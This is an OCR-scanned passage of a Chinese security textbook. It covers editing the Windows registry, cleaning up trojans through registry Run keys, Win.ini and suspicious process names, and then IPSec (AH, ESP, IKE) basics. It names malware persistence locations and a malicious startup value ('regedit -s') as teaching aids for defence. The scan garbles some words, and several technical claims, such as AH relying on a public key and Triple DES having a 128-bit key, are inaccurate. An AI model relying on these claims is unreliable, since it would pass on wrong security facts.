通过 修改 注册 表 可 以 实现 一 些 特殊 的 功能 ,但 是 注册 表 又 是 十 分 复杂 的 ,不 小 心 就 会 出 
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现 错误 。 一般 有 以 下 几 种 方法 修改 注册 表 。 

1) 软件 修改 (安全 ) 

通过 一 些 专门 的 修改 工具 来 修改 注册 表 , 比如 Windows 优化 大 师 、 超 级 兔子 、 
RegCleaner 等 。 其 实 控制 面板 也 是 一 个 这 样 的 工具 ,只 不 过 功能 简单 一 些 。 

2) 间接 修改 (比较 安全 ) 

将 要 修改 的 内 容 写 入 一 个 . reg 文件 中 ,然后 导入 注册 表 中 。. reg 文件 的 基本 格式 为 : 


REGEDIT4 


[HKEY_LOCAL MACHINE\Software\Super Rabbit\MagicSet] 
"@" = "Super Rabbit Magic Set For Windows 98 V2.92" 
"a" = dword:00000001 

"b" = hex:02,05, 00,00 


[HKEY_LOCAL MACHINE\Software\SCC\QuickViewer] 


第 一 行为 “REGEDIT4”, 必 须 大 写 。 

第 二 行为 空 行 。 

第 三 行使 用 “[ J” 括 起 子 键 分 支 ,其 中 HKEY_LOCAL_MACHINE\Software\Super 
Rabbit\ MagicSet 就 是 一 个 子 键 分 支 。 

第 四 五 .六 行 是 该 子 键 下 的 设置 数据 。 其 中 @ 表 示 注 册 表 编辑 器 右 窗 格 中 的 “ 默 
认 ” 键 。 

以 下 类 似 。 

这 样 做 的 好 处 是 可 以 避免 错误 的 写 入 或 删除 等 操作 ,但 是 要 求 用 户 必须 了 解 注 册 表 的 
内 部 结构 和 . reg 文件 的 格式 。 

3) 直接 修改 (最 不 安全 ,但 最 直接 有 效 ) 

就 是 通过 注册 表 编 辑 器 直接 来 修改 注册 表 的 键 值 数据 项 ,这 样 做 会 避免 在 注册 表 中 留 
下 残留 (虽然 都 很 小 ,但 越 来 越 多 会 拖 慢 系统 速度 ) ,但 是 要 求 用 户 有 一 定 的 注册 表 知 识 , 熟 
悉 注 册 表 内 部 结构 而 且 一 定 要 小 心 谨慎 。 


11.5 基于 注册 表 和 进程 的 木马 查 杀 技术 


11.5.1 基于 注册 表 的 木马 查 杀 技术 


作为 互联 网 的 一 员 ,避免 不 了 网 络 病毒 的 攻击 ,用 专业 杀毒 程序 杀 掉 这 些 病毒 程序 并 重 
新 启动 计算 机 系统 后 ,有 时 会 发 现 被 清除 干净 的 病毒 又 出 现 了 ,主要 原因 是 目前 不 少 流行 的 
网 络 病 毒 一 旦 启动 后 ,会 自动 在 计算 机 系统 的 注册 表 启 动 项 中 遗留 有 修复 选项 , 待 系统 重新 
启动 后 这 些 病 毒 就 能 恢复 到 修改 前 的 状态 了 。 为 了 彻底 杀 死 病毒 ,可 以 手工 将 注册 表 中 的 
病毒 遗留 选项 及 时 删除 掉 , 以 确保 计算 机 系统 不 再 遭受 病毒 的 攻击 。 

病毒 侵入 主要 有 以 下 几 种 形式 。 
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1. 阻止 通过 网 页 形式 启动 

不 少 计算 机 系统 感染 了 病毒 后 ,可 能 会 在 

HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\RunOnce 

HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Run 

HKEY_CURRENT_USER\Software\ Microsoft\ Windows\CurrentVersion\RunServices 等 
注册 表 分 支 下 面 的 键 值 中 出 现 类 似 . html 或 . htm 这 样 的 内 容 , 事 实 上 这 类 启动 键 值 主要 作 
用 就 是 等 计算 机 系统 启动 成 功 后 ,自动 访问 包含 网 络 病毒 的 特定 网 站 ,如 果 不 把 这 些 启动 键 
值 及 时 删除 掉 ,很 容易 会 导致 网 络 病 毒 重 新 发 作 。 

为 此 ,在 使 用 杀毒 程序 清除 了 计算 机 系统 中 的 病毒 后 ,还 需要 及 时 打开 系统 注册 表 编 辑 
窗口 ,并 在 该 窗口 中 逐一 查看 上 面 的 几 个 注册 表 分 支 选项 ,看 看 这 些 分 支 下 面 的 启动 键 值 中 
是 否 包 含 . html 或 . htm 这 样 的 后 级 ,一 旦 发 现 必须 选中 该 键 值 ,将 选中 的 目标 键 值 删除 掉 ， 
最 后 按 F5 功能 键 刷新 一 下 系统 注册 表 就 可 以 了 。 

当然 ,也 有 一 些 病 毒 会 在 上 述 几 个 注册 表 分 支 下 面 的 启动 键 值 中 ,遗留 有 . vbs 格式 的 
启动 键 值 ,发 现 这 样 的 启动 键 值 时 也 要 一 并 将 它们 删除 掉 。 

2. 阻止 通过 后 门 进行 启动 

为 了 躲避 用 户 手 工 清理 病毒 文件 ,不 少 网 络 病毒 会 在 系统 注册 表 的 启动 项 中 进行 一 些 
伪装 隐蔽 操作 ,不 熟悉 系统 的 用 户 往往 不 敢 随意 清除 这 些 启 动 键 值 ,这 样 一 来 病毒 程序 就 能 
达到 重新 启动 目的 了 。 例 如 ,一 些 病 毒 会 在 上 面 几 个 注册 表 分 支 下 面 创建 一 个 名 为 
“system32” 的 启动 键 值 , 并 将 该 键 值 的 数值 设置 成 “regedit -s D:\Windows”, 表 面 看 上 去 ， 
许多 用 户 会 认为 这 个 启动 键 值 是 计算 机 系统 自动 产生 的 ,而 不 敢 删 掉 , 其 实 “-s” 参 数 是 系统 
注册 表 的 后 门 参数 ,该 参数 的 作用 是 用 来 导入 注册 表 的 ,同时 能 够 在 Windows 系统 的 安装 
目录 中 自动 产生 vbs 格式 的 文件 ,通过 这 些 文件 病毒 就 能 实现 自动 启动 的 目的 了 。 所 以 , 当 
在 上 面 几 个 注册 表 分 支 的 启动 项 中 看 到 “regedit -s D:\ Windows” 这 样 的 带 后 门 参数 键 值 
时 ,必须 删除 。 

3. 阻止 通过 文件 进行 启动 

除了 要 检查 注册 表 启 动 键 值 外 ,还 要 对 系统 的 Win. ini 文件 进行 检查 ,因为 网 络 病毒 也 
会 在 这 个 文件 中 自动 产生 一 些 遗 留 项 目 ,如 果 不 将 该 文件 中 的 非法 启动 项 目 删除 ,网 络 病毒 
很 可 能 会 再 次 侵入 。 

一 般 来 说 , Win. ini 文件 常 位 于 系统 的 Windows 安装 目录 中 ,可 以 进入 到 系统 的 资源 管 
理 器 窗口 ,并 在 该 窗口 中 找到 并 打开 该 文件 ,然后 在 文件 编辑 区 域 中 检查 "run 一 ”“load 一 ” 
等 选项 后 面 是 否 包含 一 些 来 历 不 明 的 内 容 , 要 是 发 现 , 必 须 及 时 将 “二” 后 面 的 内 容 清除 干 
净 ; 当然 ,在 删除 之 前 最 好 看 一 下 具体 的 文件 名 和 路 径 ,完成 删除 操作 后 ,再 进入 到 系统 的 
system 文件 夹 中 将 对 应 的 病毒 文件 删除 。 

病毒 经 常 修改 的 注册 表 键 值 有 以 下 几 个 。 

(1) IE 起 始 页 的 修改 

HKEY_CURRENT_USER\ Software\ Microsoft\Internet Explorer\Main 右 半 部 分 窗 
口中 的 Start Page 就 是 IE 主页 地 址 。 
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(2) Internet 选项 按钮 灰 化 或 者 失效 

HKEY_CURRENT_USER\Software\Policies\ Microsoft\Internet Explorer\Control 
Panel 下 的 DWORD 值 *Setting” 二 dword:1; “Links” 二 dword:1; “SecAddSites”dword:1 
全 部 改 为 0 之 后 再 将 HKEY _ USERS\ DEFAULT \\ Software\ Policies \ Microsoft \ 
InternetExplorer\ Control Panel 下 的 DWORD 值 homepage 键 值 改 为 0 则 无 法 使 用 
“Internet 选项 ”修改 下 设置 。 

(3)“ 源 文件 ”项 不 可 用 

HKEY_CURRENT_USER\ Software\ Policies\ Microsoft\ InternetExplorer\ Restrictions 下 
的 NoViewSource 键 值 可 能 设置 为 1 了 , 改 为 0 就 可 恢复 正常 。 

(4)“ 和 运行 ?按钮 被 取消 或 者 失效 

HKEY_CURRENT_USER\Software\ Microsoft\ Windows\CurrentVersion\ Policies\ 
Explorer 的 NoRun 键 值 可 能 被 改 为 1 了 , 改 为 0 就 可 恢复 。 

(5)“ 关 机 ?按钮 被 取消 或 者 失效 

HKEY_CURRENT_USER\Software\ Microsoft\ Windows\CurrentVersion\ Policies\ 
Explorer 的 NoClose 键 值 可 能 被 改 为 1 了 , 改 为 0 就 可 恢复 。 

(6)“ 注 销 ” 按 钮 被 取消 或 者 失效 

HKEY_CURRENT_USER\Software\ Microsoft\ Windows\Current Version\Policies\ 
Explorer 的 NoLogOff 键 值 可 能 被 改 为 1 了 , 改 为 0 就 可 恢复 。 

(7) 磁盘 驱动 器 被 隐藏 

HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\ 
Explorer 的 NoDrives 键 值 可 能 被 改 为 1 了 , 改 为 0 就 可 恢复 。 


11.5.2 基于 进程 的 木马 查 杀 技术 


通过 进程 来 查 杀 木马 ,主要 从 以 下 7 方面 进行 。 

(1) 了 解 系统 正常 运行 的 进程 。 

系统 必须 运行 的 进程 包括 : smss. exe、csrss. exe、winlogon. exe、services. exe lsass. exe、 
svchost. exe( 可 以 同时 存在 多 个 ) .spoolsv. exe、explorer. exe、System Idle Process, 具 体 的 
描述 在 前 面 已 经 说 明 , 这 里 不 再 重复 。 

(2) 了 解 系 统 非 必需 进程 。 

这 些 系统 进程 虽然 不 是 系统 运行 必需 的 ,但 也 经 常 在 进程 列表 中 出 现 。 如 internat. exe、 
systray. exe, rundll32. exe 、 loadwc. exe、ddhelp. exe、mstask. exe, ctfmon. exe, taskmagr. exe、 
msnmsgr. exe .wmiexe. exe, 它 们 都 是 正常 的 。 

(3) 在 安装 完 Windows 后 , 单 击 “ 开 始 ”> “程序 ”>“ 附 件 ”>“ 系 统 工具 ”一 “系统 信 
息 ”, 在 打开 的 “系统 信息 ”窗口 中 再 单 击 “ 软 件 环境 ”正在 运行 任务 "在 此 进程 列表 中 ,可 
看 到 更 详细 的 属性 ,其 中 程序 路 径 是 非常 重要 的 信息 ), 如 图 11-16 所 示 。 接 下 来 单 击 “ 操 
作 ” 一 “导出 ”, 默 认 格式 为 文本 文件 ,以 后 系统 出 现 异 常 时 则 可 对 照 进 行 分 析 。 

(4) 如 何在 进程 中 发 现 木马 。 

许多 木马 和 一 些 防 护 工具 采用 了 双 进 程 保护 手段 ,例如 Falling Star 木马 就 采用 双 进 程 
模式 ,下 面 来 看 看 如 何 发 现 它们 以 及 进行 删除 。 
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打开 任务 管理 器 。 通 过 和 常见 进程 比较 ,很 明显 会 发 现 两 个 和 系统 基本 进程 名 称 相 似 ， 
但 不 相同 的 进程 ,它们 是 internet. exe 和 systemtray. exe。 

打开 “系统 信息 ”的 “软件 环境 "一 “正在 运行 任务 ,查看 路 径 信息 ,两 者 均 指 向 
Windows System32 目录 ,而 且 文 件 大 小 、 日 期 均 相 同 , 但 从 文件 日 期 来 看 并 不 属于 微软 的 
系统 文件 。 进 入 资源 管理 器 查看 其 版 本 属性 ,虽然 公司 标明 为 Microsoft, 但 与 系统 文件 中 
的 微软 公司 名 称 书写 并 不 相同 ,基本 可 断定 是 非法 进程 ,并 且 为 双 进 程 模式 。 

在 尝试 结束 进程 时 ,第 一 次 选择 systemtray. exe 来 结束 进程 树 , 结 果 进 程 马 上 就 出 现 
了 ,任务 管理 器 中 又 显示 出 这 两 个 进程 。 于 是 再 次 选择 internet. exe, 然 后 结束 进程 树 ,从 而 
将 木马 进程 从 系统 中 清除 。 

(5) 修改 常见 程序 或 进程 中 的 个 别 字符 。 

例如 , 上面 介 绍 的 Falling Star 木马 的 进程 名 称 “internet. exe” 就 与 输入 法 进程 
“internat. exe” 十 分 相似 。 还 有 Explorer. exe 和 Explorer. exe 的 区 别 , 不 仔细 的 话 是 看 不 
出 来 的 (数字 “1? 取 代 了 字母 "1”) 。 

(6) 修改 扩展 名 。 

著名 的 冰河 木马 的 服务 器 端 进程 为 Kernel32. exe, 乍 一 看 是 系统 进程 ,其 实 系统 根本 不 
存在 这 样 一 个 文件 ,Windows 9x 的 基本 进程 中 却 有 一 个 叫做 “Kernel32. dl 的。 诸如 此 类 
的 还 有 “Shell32. exe” 的 木马 进程 是 从 “Shell32. dll” 这 个 大 家 都 很 熟悉 的 文件 修改 而 来 的 ， 
实际 在 系统 中 都 是 不 存在 的 。 

(7) 路 径 伪 装 。 

Windows 目录 和 System 目录 是 系统 核心 文件 所 在 地 ,因此 ,出 入 它们 的 文件 一 般 都 被 
人 们 认为 是 系统 文件 ,而 病毒 和 木马 就 借 机 将 源 文 件 放 在 这 两 个 目录 中 。 对 于 这 种 情况 ,一 
般 只 需要 通过 系统 信息 找到 其 源 文件 路 径 , 打 开 文 件 的 属性 ,从 日 期 .版 本 、 公 司 名 称 信息 中 
即 可 看 出 破绽 。 
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本 章 学 习 要 求 : 

。 熟悉 IP 安全 的 概念 和 IP 安全 体系 结构 。 
。 掌握 安全 隧道 的 建立 方法 。 

。 掌握 IPSec 的 作用 方式 。 

。 熟悉 VPN 基本 原理 。 

。 掌握 VPN 隧道 技术 。 

。 了解 Web 安全 威胁 。 

。 熟悉 Web 安全 的 实现 方法 。 
。 掌握 SSL 协议 的 构成 。 

。 了 解 安全 电子 交易 SET。 

。 掌握 安全 的 Web 站 点 的 创建 。 


12.1 JIP 安全 


12.1.1 IP 安全 概述 


大 型 网 络 系统 内 运行 多 种 网 络 协议 (TCP/IP、IPX/SPX 和 NetBEUI 等 ) ,而 这 些 网 络 
协议 并 非 专 为 安全 通信 设计 。 因 特 网 协议 (IP) 维 系 着 整个 TCP/IP 的 体系 结构 。 除 了 数据 
链 路 层 外 ,TCP/IP 协议 栈 的 所 有 协议 的 数据 都 是 以 IP 数据 报 的 形式 传输 的 ,TCP/IP 协议 
簇 有 两 个 IP 版 本 ,分 别 是 IPv4(IP 协议 的 第 4 个 版 本 ) 和 IPv6(IP 协议 的 第 6 个 版 本 )。 其 
中 IPv6 是 为 了 解决 IPv4 存在 的 地 址 短缺 问题 而 设计 的 。IPv6 简化 了 IP 头 部 ,数据 报 更 加 
灵活 。 同 时 IPv6 还 增加 了 对 安全 性 的 考虑 。 

目前 ,IPv4 在 因特网 上 占 统治 地 位 。IPv4 在 设计 之 初 并 未 考虑 安全 性 ,IP 包 并 不 存在 
任何 安全 特性 ,导致 在 网 络 上 传输 的 数据 很 容易 受到 各 式 各 样 的 攻击 。 攻 击 者 很 容易 伪造 
IP 包 的 地 址 ,修改 包 中 的 内 容 、 重 播 以 前 的 包 以 及 在 传输 途中 拦截 并 查看 包 的 内 容 等 。 因 
此 ,通信 双方 不 能 保证 收 到 IP 数据 报 的 真实 性 。 

为 了 加 强 因 特 网 的 安全 性 ,从 1995 年 开始 ,IETF 着 手 制 定 了 一 套用 于 保护 IP 通信 的 
IP 安全 协议 (IP Security,IPSec) 。IPSec 是 IPv6 的 一 个 组 成 部 分 ,是 IPv4 的 一 个 可 选 扩展 
协议 。IPSec 弥补 了 IPv4 在 协议 设计 时 安全 性 方面 的 不 足 。 

IPSec 定义 了 一 种 标准 的 、 健 壮 的 以 及 包容 广泛 的 机 制 ,可 用 它 为 IP 以 及 上 层 协议 ( 比 
如 TCP 或 者 UDP) 提 供 安全 保证 。IPSec 的 目标 是 为 IPv4 和 IPv6 提供 具有 较 强 的 互 操作 
能 力 ,高 质量 和 基于 密码 的 安全 功能 ,在 IP 层 实现 多 种 安全 服务 ,包括 访问 控制 数据 完整 
性 、 机 密 性 等 。IPSec 通过 支持 一 系列 加 密 算法 如 DES、 三 重 DES、IDEA 和 AES 等 确保 通 
信 双 方 的 机 密 性 。 
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IPSec 协议 集 提 供 了 下 面 几 个 方面 的 安全 服务 。 

(1) 数据 完整 性 (Data Integrity) : 保持 数据 的 一 致 性 ,防止 未 授权 地 生成 、 修 改 或 删除 
数据 。 

(2) 认证 (Authentication) : 保证 接收 的 数据 与 发 送 的 数据 相同 ,保证 实际 发 送 者 就 是 
声称 的 发 送 者 。 

(3) 保密 性 (Confidentiality) : 传输 的 数据 是 经 过 加 密 的 ,只 有 预订 的 接收 者 知道 发 送 
的 内 容 。 

(4) 应 用 透明 的 安全 性 (Application-transparent Security) : IPSec 的 安全 头 插入 在 标 
准 的 IP 头 和 上 层 协 议 ( 如 TCP) 之 间 ,任何 网 络 服务 和 网 络 应 用 可 以 不 经 修改 地 从 标准 IP 
转向 IPSec, 同 时 IPSec 通信 也 可 以 透明 地 通过 现 有 的 IP 路 由 器 。 

IPSec 实际 上 是 一 套 协 议 包 而 不 是 一 个 单个 的 协议 ,这 一 点 对 于 人 们 认识 IPsec 是 很 重 
要 的 。IPSec 由 AH 协议 .ESP 协议 和 IKE 组成。 

(1) 认证 头 (Authentication Header,AH) 用 于 数据 源 认证 和 数据 完整 性 认证 ,可 以 证 
明 数 据 的 起 源 地 ,保障 数据 的 完整 性 以 及 防止 相同 数据 包 在 因特网 重播 。 

(2) 封装 安全 载荷 (Encapsulating Security Payload,ESP) 具 有 所 有 AH 的 功能 ,还 可 
以 利用 加 密 技 术 保 障 数 据 机 密 性 。 

(3) Internet 密 钥 交换 协议 (Internet Key Exchange,IKE) 用 于 生成 和 分 发 在 AH 和 
ESP 中 使 用 的 密 钥 ,IKE 也 对 远程 系统 进行 初始 认证 。 

虽然 AH 和 ESP 都 可 以 提供 身份 认证 ,但 它们 也 有 区 别 。 首 先 ESP 要 求 使 用 高 强度 
的 加 密 算法 ,会 受到 许多 限制 。 其 次 ,在 多 数 情况 下 ,使 用 AH 的 认证 服务 已 能 满足 要 求 ， 
相对 来 说 ,ESP 开销 较 大 。 有 两 套 不 同 的 安全 协议 意味 着 可 以 对 IPSec 网 络 进 行 更 细 粒 度 
的 控制 ,选择 安全 方案 时 可 以 有 更 大 的 灵活 度 。IP 层 的 安全 性 应 达到 以 下 几 个 目标 。 

(1) 期 望 安全 的 用 户 能 够 使 用 基于 密码 学 的 安全 机 制 。 

(2) 应 能 同时 适用 于 IPv4 和 IPv6 。 

(3) 算法 独立 。 

(4) 有 利于 实现 不 同 的 安全 策略 。 

(5) 对 没有 采取 该 机 制 的 用 户 不 会 有 负面 影响 。 


12.1.2 IP 安全 体系 结构 


IPSec 由 一 系列 协议 组 成 ,其 体系 结构 如 图 12-1 所 示 。 

(1) 体系 结构 (Architecture) : 包含 总 体 的 概念 、 安 全 需求 和 定义 IPSec 技术 的 机 制 。 

(2) 认证 头 (Authentication Header, AH): 包含 与 使 用 AH 进行 包 身 份 验证 相关 的 包 
格式 和 一 般 性 问题 。 

(3) 封装 安全 载荷 (Encapsulating Security Payload,ESP) : 使 用 ESP 进行 包 加 密 的 报 
文 格式 和 一 般 性 问题 ,以 及 可 选 的 认证 。 

(4) 加 密 算法 (Encapsulation Algorithm): 描述 各 种 加 密 算法 如 何 用 于 ESP 的 一 组 
文档 。 

(5) 认证 算法 (Authentication Algorithm): 描述 各 种 身份 验证 算法 如 何 用 于 AH 和 
ESP 身份 验证 选项 的 一 组 文档 。 
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体系 结构 


1 1 
封装 安全 载荷 ESP| 验证 头 AH 


图 12-1 IPSec 体系 结构 


(6) 密 钥 管理 (Key Management) : 说 明 密 钥 管理 方案 的 一 组 文档 。 

(7) 解释 域 (Domain of Interpretation,DOD : 包含 彼此 相关 的 其 他 文档 需要 的 值 , 包 括 
被 认可 的 加 密 和 身份 验证 算法 的 标识 符 以 及 运作 参数 ,如 密 钥 生存 周期 等 。 

(8) 策略 (Policy) : 决定 两 个 实体 之 间 能 否 通 信 , 以 及 如 何 进行 通信 。 策 略 的 核心 由 三 
部 分 组 成 : SA、SAD、SPD。SA( 安 全 关联 ) 表 示 了 策略 实施 的 具体 细节 ,包括 源 / 目 的 地 址 、 
应 用 协议 .SPI(Security Parameter Index, 安 全 参数 索引 ,IPSec 协议 基本 概念 之 一 ,是 一 个 
32b 长 的 数值 ,在 每 一 个 IPSec 报 文中 都 携带 该 值 ,SPI\IP 目的 地 址 、 安 全 协议 号 三 者 结合 
起 来 共同 构成 一 个 三 元 组 ,来 唯一 标识 一 个 特定 的 安全 联盟 )、 所 用 算法 / 密 钥 / 长 度 ; SAD 
为 进入 和 外 出 包 处 理 维持 一 个 活动 的 SA 列表 ; SPD 决定 了 整个 VPN 的 安全 需求 。 策 略 
部 分 是 唯一 尚未 成 为 标准 的 组 件 。 对 于 上 述 协议 的 支持 ,在 IPv6 中 是 强制 的 ,在 IPv4 中 是 
可 选 的 。 认 证 的 扩展 包头 称 为 AH ,加 密 的 扩展 包头 称 为 ESP 头 。 


12.1.3 安全 隧道 的 建立 


IPSec 通过 上 述 三 个 基本 协议 在 IP 包头 后 增加 新 的 字段 来 实现 安全 保证 。 下 面 来 看 
一 个 实际 的 例子 。 比 如 想 通过 网 络 去 书店 购买 一 本 《计算 机 网 络 ? 图 书 , 当 订单 传递 到 书店 
时 ,问题 出 现 了 。 管 理 员 想 知道 这 是 否 是 一 个 真实 的 订单 , 它 是 否 真 地 是 从 书店 的 客户 那里 
发 送出 来 的 。 同 时 购买 者 自己 也 想 知道 我 的 订单 在 传输 的 过 程 中 是 否 被 黑客 修改 过 。 比 如 
黑客 会 不 会 把 我 订购 的 数目 从 1 本 改 成 100 本 ,或 把 地 址 做 了 修改 。 这 样 的 例子 举 不 胜 举 ， 
只 要 有 信息 在 网 上 传递 ,就 需要 考虑 信息 源 的 可 靠 性 和 数据 的 完整 性 。 

AH 包头 可 以 保证 信息 源 的 可 靠 性 和 数据 的 完整 性 。AH 验证 包头 如 图 12-2 所 示 , 首 
先 发 送 方 将 IP 包头 、 高 层 的 数据 和 公共 密 钥 这 三 部 分 通过 某 种 散 列 算法 进行 计算 ,得 出 
AH 包头 中 的 验证 数据 ,并 将 AH 包头 加 入 数据 包 中 ; 当 数 据 传输 到 接收 方 时 ,接收 方 将 收 
到 的 IP 包头、 数据 公共 密 钥 以 相同 的 散 列 算法 进行 运算 ,并 把 得 出 的 结果 同 收 到 的 数据 包 
中 的 AH 包头 进行 比较 ; 如 果 结 果 相 同 则 表明 数据 在 传输 过 程 中 没有 被 修改 ,并 且 是 从 真 
正 的 信息 源 处 发 出 的 。 因 为 公共 密 钥 和 散 列 算法 可 以 保证 这 些 。 

信息 源 的 可 靠 性 可 以 通过 公共 密 钥 来 保证 。IPSec 认证 头 提供 了 数据 完整 性 和 数据 源 
验证 ,但 是 不 提供 保密 服务 。AH 包含 对 称 密 钥 的 散 列 函 数 ,使 得 第 三 方 无 法 修改 传输 中 的 
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原 IP 数 据 包 | ”IP 头 高 层 协议 数据 


密 钥 
营 ” 散 列 曝 法 
增加 AH 头 后 的 (MD5 或 SHA1) 


数据 包 IP 头 AH 高 层 协议 数据 


图 12-2 AH 验证 包头 


数据 。IPSec 支持 下 面 的 认证 算法 。 

(1) HMAC-MD5(HMAC-Message Digest 5)128 位 密 钥 。 

(2) HMAC-SHA1(Hashed Message Authentication Code-Secure Hash Algorithm 1) 
160 位 密 钥 。 

这 些 算法 有 两 个 共同 的 特点 ,第 一 个 是 不 可 能 从 计算 结果 推导 出 它 的 原始 输入 数据 ,第 
二 个 是 不 可 能 从 给 定 的 一 组 数据 和 它 经 过 散 列 算法 计算 出 的 结果 推导 出 另外 一 组 数据 产生 
的 结果 。 

MD5 是 单 向 数学 函数 , 它 可 以 对 输入 的 数据 进行 运算 ,产生 代表 该 数据 的 128b 指纹 信 
息 。 在 这 种 方式 下 ,MD5 提供 完整 性 服务 。128b 指纹 信息 可 以 在 信息 发 送 之 前 和 数据 接 
收 之 后 计算 出 来 。 如 果 两 次 计算 结果 相同 ,那么 数据 在 传输 过 程 中 就 没有 被 改变 。SHA1 
与 MD5 类 似 ,只 是 它 产生 160b 指纹 信息 ,所 以 运算 时 间 比 MD5 稍 长 ,安全 性 更 高 一 些 。 
当 HMAC 和 MD5 共同 使 用 时 ,可 以 对 每 64B 的 数据 进行 运算 ,得 出 16B 的 指纹 信息 ,并 放 
和 人 AH 包头 中 。 

AH 由 于 没有 对 用 户 数 据 进行 加 密 , 所 以 黑客 使 用 协议 分 析 仪 照样 可 以 窃取 在 网 络 中 
传输 的 敏感 信息 ,所 以 使 用 封装 安全 载荷 CESP) 协 议 把 需要 保护 的 用 户 数 据 进行 加 密 , 并 放 
到 IP 包 中 ,ESP 提供 数据 的 完整 性 可靠 性 。ESP 协议 非常 灵活 ,可 以 选择 多 种 加 密 算法 ， 
包括 DES Triple DES( 三 重 DES) ,RC4、RC5 IDEA 和 Blowfish。 

DES 是 最 常用 的 加 密 算法 ,其 特点 是 采用 56 位 的 密 钥 ,处 理 64 位 的 输入 ,加 密 解 密使 
用 同一 个 密 钥 或 可 以 相互 推导 出 来 。DES 把 数据 分 成 长 度 为 64 位 的 数据 块 ,其 中 8 位 作 
为 奇偶 校 验 , 有 效 码 长 为 56 位 。 由 于 计算 机 性 能 的 提高 ,采用 多 台 高 性 能 服务 器 可 以 攻破 
56 位 DES, 所 以 Triple DES 出 现 了 , 它 采用 128 位 密 钥 提高 了 安全 性 。 

IDEA 算法 采用 128 位 密 钥 ,每 次 加 密 一 个 64 位 的 数据 块 。RC5 算法 中 数据 块 的 大 
小 、 密 钥 的 大 小 和 循环 次 数 都 是 可 变 的 , 密 钥 甚至 可 以 扩充 到 2048 位 ,具有 极 高 的 安全 性 。 
Blowfish 算法 使 用 变 长 的 密 钥 ,长 度 可 达 448 位 ,运行 速度 很 快 。 

以 上 算法 均 要 使 用 一 个 由 通信 各 方 共 享 的 密 钥 , 称 做 对 称 密码 算法 。 接 收 方 只 有 使 用 
发 送 方 用 来 加 密 数据 的 密 钥 才 能 解密 ,所 以 其 安全 性 依赖 于 密 钥 的 安全 。 

AH 和 ESP 可 以 单独 使 用 ,也 可 以 一 起 使 用 。 为 了 更 好 地 保证 系统 的 安全 性 ,建议 同 
时 使 用 。 


12.1.4 IPSec 的 作用 方式 


IPSec 有 两 种 工作 方式 : 隧道 方式 和 传输 方式 。 在 隧道 方式 中 ,整个 用 户 的 IP 数据 包 
被 用 来 计算 ESP 包头 ,整个 IP 包 被 加 密 并 和 ESP 包头 一 起 被 封装 在 一 个 新 的 卫 包 内 。 这 
样 当 数据 在 Internet 上 传送 时 ,真正 的 源 地 址 和 目的 地 址 被 隐藏 起 来 。 隧 道 方式 数据 包 如 
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图 12-3 所 示 。 
原始 IP 数 据 包 格式 
| rx 高 层 协议 数据 


隧道 方式 数据 包 格式 
新 的 IP 头 | ASeRESR) | | 原 IP 关 | 高层 协 议 数据 
加 密 部 分 
图 12-3 ”隧道 方式 数据 包 
在 传输 方式 中 ,只 有 高 层 协议 (TCP、UDP、ICMP 等 ) 及 数据 进行 加 密 , 如 图 12-4 所 示 。 

在 这 种 方式 下 , 源 地 址 、 目 的 地 址 以 及 所 有 IP 包头 的 内 容 都 不 加 密 。 

原始 IP 数 据 包 格式 

| IP 头 高 层 协议 数据 


传输 方式 数据 包 格式 


IP 关 | 人 Se 高 层 协议 数据 | 


12-4 ”传输 方式 数据 包 


由 于 对 称 密 钥 存 在 着 许多 问题 , 密 钥 传递 时 容易 泄密 。 网 络 通信 时 如 果 网 内 用 户 采 用 
同样 的 密 钥 ,就 失去 了 保密 的 意义 。 但 如 果 任 意 两 个 用 户 通信 时 都 使 用 互 不 相同 的 密 钥 ,N 
个 人 就 要 使 用 N X(N 一 1)/2 个 密 钥 , 密 钥 量 太 大 ,在 实际 使 用 中 无 法 实现 ,所 以 在 IPSec 中 
使 用 非 对称 密 钥 技 术 ,将 加 密 和 解密 的 密 钥 分 开 ,并 且 不 可 能 从 其 中 一 个 推导 出 另外 一 个 。 
采用 非 对 称 密 钥 技 术 后 ,每 一 个 用 户 都 有 一 对 选 定 的 密 钥 ,一 个 由 用 户 自己 保存 ,一 个 可 以 
公开 得 到 。 它 的 好 处 在 于 密 钥 分 配 简单 ,由 于 加 密 和 解密 的 密 钥 互 不 相同 并 且 无 法 互相 推 
导 , 所 以 加 密 的 密 钥 可 以 分 发 给 各 个 用 户 ,而 解密 密 钥 由 用 户 自 己 保 存 。 这 样 一 来 , 密 钥 保 
存量 少 ,N 个 用 户 通 信 最 多 只 需 保 存 N 对 密 钥 ,便于 管理 ,可 以 满足 不 同 用 户 间 通信 的 私密 
性 ,完成 数字 签名 和 数字 鉴别 。 目 前 有 许多 种 非 对称 密 钥 算法 ,其 中 有 的 适用 于 密 钥 分 配 ， 
有 的 适用 于 数字 签名 。 

IPSec 中 的 AH 和 ESP 实际 上 只 是 加 密 的 使 用 者 ,为 保证 通信 的 双方 可 以 互相 信任 ,并 
采用 相同 的 加 密 算 法 ,IETF 制定 了 IKE 用 于 通信 双方 进行 身份 认证 ,协商 加 密 算 法 和 散 列 
算法 .生成 公 钥 。 

在 IPSec 的 具体 实现 中 ,采用 密 钥 管理 协议 (ISAKMP Oakley), 密 钥 交 换 采 用 
DiffieHellman 协议 ,身份 认证 采用 数字 签名 和 公开 密 钥 。 

IPSec 不 仅 可 以 保证 隧道 的 安全 ,同时 还 有 一 整套 保证 用 户 数据 安全 的 措施 ,利用 它 建 
立 起 来 的 隧道 更 具有 安全 性 和 可 靠 性 。IPSec 还 可 以 和 L2TP、GRE 等 其 他 隧道 协议 一 同 
使 用 ,给 用 户 提 供 更 大 的 灵活 性 和 可 靠 性 。 此 外 ,IPSec 可 以 运行 于 网 络 的 任意 一 部 分 , 它 
可 以 运行 在 路 由 器 和 防火 墙 之 间 、 路 由 器 和 路 由 器 之 间 、PC 和 服务 器 之 间 、PC 和 拨号 访问 
设备 之 间 。 当 IPSec 运行 于 路 由 器 /网 关 时 ,安装 配置 简单 ,只 需 在 网 络 设备 上 进行 配置 ,由 
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网 络 提供 安全 性 ; 当 IPSec 运行 于 服务 器 /PC 时 ,可 以 提供 端 到 端的 安全 ,在 应 用 层 进行 控 
制 ,但 它 的 缺点 是 安装 配置 和 管理 比较 复杂 。 在 实际 应 用 中 ,可 以 根据 用 户 的 需求 选择 相应 
的 方式 。 


12.2 VPN 技术 


12.2.1 VPN 基本 原理 


虚拟 专用 网 (Virtual Private Network,VPN) 就 是 建立 在 公用 网 上 的 、 由 某 一 组 织 或 某 
